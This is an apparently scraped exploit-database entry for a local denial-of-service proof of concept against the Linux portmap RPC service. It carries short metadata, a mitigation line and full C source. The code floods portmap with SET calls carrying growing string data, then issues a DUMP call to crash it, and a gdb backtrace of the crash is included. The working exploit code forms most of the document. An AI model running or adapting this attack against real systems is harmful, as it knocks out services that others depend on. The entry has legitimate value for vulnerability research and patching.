portmap Set+Dump Local DoS - PoC

vendor:

by:

Federico L. Bossi Bonin

5.3

CVSS

MEDIUM

Denial of Service

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux

portmap Set+Dump Local DoS – PoC

This exploit causes a denial of service vulnerability in the portmap service on Linux. By sending a specially crafted request, an attacker can cause the service to crash, resulting in a denial of service condition. This vulnerability has been tested on Linux with version 5.

Mitigation:

Apply the latest patches and updates for the affected Linux version. Disable the portmap service if it is not required.

Source

Exploit-DB raw data:

/////////////////////////////////////
// portmap Set+Dump Local DoS - PoC 
////////////////////////////////////
//
// Federico L. Bossi Bonin
// fbossi[at]netcomm[dot]com[dot]ar
////////////////////////////////////

// Tested on Linux with version 5

// USE DEBUGGING MODE
/////////////////////

// (gdb) backtrace
// #0  0xffffe410 in __kernel_vsyscall ()
// #1  0xb7f21343 in write () from /lib/tls/libc.so.6
// #2  0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6
// #3  0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6
// #4  0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6
// #5  0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6
// #6  0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6
// #7  0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6
// #8  0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6
// #9  0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6
// #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6
// #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6
// #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6
// #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6
// #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at portmap.c:515
// #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6
// #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6
// #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6
// #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at portmap.c:303

#include <stdio.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>
#include <rpc/pmap_prot.h>

int i;
int len=600;
char    myhost[256];

main(int argc, char *argv[]) {

if (argc < 2) {
printf("usage:%s <hostname>\n",argv[0]);
exit(1);
}

if (argc >2) { len=atoi(argv[2]);  }
if (len > 1024) { len=1024; }

unsigned long PROGRAM=100000;
unsigned long VERSION=2;

struct hostent *hp;
struct sockaddr_in server_addr;
int sock = RPC_ANYSOCK;
register CLIENT *client;
enum clnt_stat clnt_stat;
struct timeval timeout;
timeout.tv_sec = 40;
timeout.tv_usec = 0;


if ((hp = gethostbyname(argv[1])) == NULL) {
printf("Can't resolve %s\n",argv[1]);
exit(0);
}

gethostname(myhost,255);
bcopy(hp->h_addr, (caddr_t)&server_addr.sin_addr,hp->h_length);
server_addr.sin_family = AF_INET;
server_addr.sin_port =  0;

if ((client = clnttcp_create(&server_addr,PROGRAM,VERSION,&sock,1024,1024)) == NULL) {
clnt_pcreateerror("clnttcp_create");
exit(0);
}

client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL);

char *data = (char *) malloc(1024);
memset(data,0x0,strlen(data));

char *response = (char *) malloc(1024);
memset(response,0x0,strlen(response));

for (i = 0 ; i < len ; i++) {
memcpy(data+strlen(data),"1",1);
clnt_call(client,1,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *)  response,timeout);
}

clnt_call(client,4,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *)  response,timeout);

clnt_destroy(client);
close(sock);
free(data);
free(response);
exit(0);
}

// milw0rm.com [2006-05-22]